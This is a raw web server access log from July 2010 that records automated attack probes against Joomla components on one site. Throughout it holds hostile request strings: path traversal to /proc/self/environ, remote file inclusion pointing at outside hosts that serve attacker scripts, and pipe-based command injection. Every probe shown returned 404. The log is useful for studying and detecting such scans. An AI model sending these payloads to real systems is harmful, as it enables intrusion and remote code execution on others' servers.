205.234.145.217 - - [26/Jul/2010:08:11:01 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:03 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:03 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:03 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:45 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:46 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:49 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:53 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:54 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:54 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:54 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:13:41 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:13:41 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:13:42 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:18 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:18 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:18 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:26 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:26 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:26 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:33 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:33 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:34 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
87.98.217.83 - - [26/Jul/2010:08:21:16 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:21:16 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:21:16 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:21:17 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:21:17 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:21:17 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
114.108.151.149 - - [26/Jul/2010:08:23:32 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:23:33 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:23:33 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:25:30 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:25:30 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:25:31 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
67.205.67.73 - - [26/Jul/2010:08:32:17 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
67.205.67.73 - - [26/Jul/2010:08:32:17 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
67.205.67.73 - - [26/Jul/2010:08:32:19 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
67.205.67.73 - - [26/Jul/2010:08:32:19 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
203.105.83.126 - - [26/Jul/2010:08:36:00 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 321 "-" "Jcomers Bot Scan"
203.105.83.126 - - [26/Jul/2010:08:36:00 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 326 "-" "Jcomers Bot Scan"
203.105.83.126 - - [26/Jul/2010:08:36:25 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 321 "-" "Jcomers Bot Scan"
203.105.83.126 - - [26/Jul/2010:08:36:25 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 326 "-" "Jcomers Bot Scan"
74.81.81.17 - - [26/Jul/2010:08:44:38 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:38 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:38 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:38 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:38 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:39 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:45 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:45 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:45 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:45 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:45 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:44:45 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
67.139.30.87 - - [26/Jul/2010:08:45:28 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:45:28 +0200] "GET /logs/access_log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 348 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:45:28 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 335 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:45:30 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:45:30 +0200] "GET /logs/access_log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 348 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:45:30 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 335 "-" "Mozilla/5.0"
112.104.57.22 - - [26/Jul/2010:08:46:12 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:46:23 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:46:34 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:48:46 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:48:46 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:49:17 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:49:17 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:49:26 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:49:27 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
62.141.52.11 - - [26/Jul/2010:08:50:10 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:50:10 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:50:10 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:50:10 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:50:10 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:50:17 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:51:16 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:51:17 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:51:17 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:51:17 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:51:18 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:51:18 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
112.104.57.22 - - [26/Jul/2010:08:53:11 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:53:12 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:53:12 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
114.108.151.149 - - [26/Jul/2010:08:53:14 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:53:15 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:53:15 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
112.104.57.22 - - [26/Jul/2010:08:53:28 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:53:29 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:53:29 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:53:51 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:53:51 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:53:52 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
212.92.13.125 - - [26/Jul/2010:09:01:24 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:24 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:44 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:44 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:44 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:45 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:45 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:46 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:04:08 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:04:08 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:04:14 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:04:14 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:04:16 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:04:21 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
121.78.118.123 - - [26/Jul/2010:09:06:35 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:09:06:35 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:09:06:36 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:09:09:25 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:09:09:26 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:09:09:26 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.141.52.11 - - [26/Jul/2010:09:14:13 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:14:18 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
83.93.131.189 - - [26/Jul/2010:09:16:43 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 325 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:09:17:18 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:09:17:18 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:09:17:18 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
91.208.211.151 - - [26/Jul/2010:09:49:40 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
67.195.112.178 - - [26/Jul/2010:09:57:45 +0200] "GET /?C=S;O=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.93.131.189 - - [26/Jul/2010:10:02:03 +0200] "GET /logs/access_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 341 "-" "libwww-perl/5.805"
83.93.131.189 - - [26/Jul/2010:10:02:03 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 325 "-" "libwww-perl/5.805"
83.93.131.189 - - [26/Jul/2010:10:02:03 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 330 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:09 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:09 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:11 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:11 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:14 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:14 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:16 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
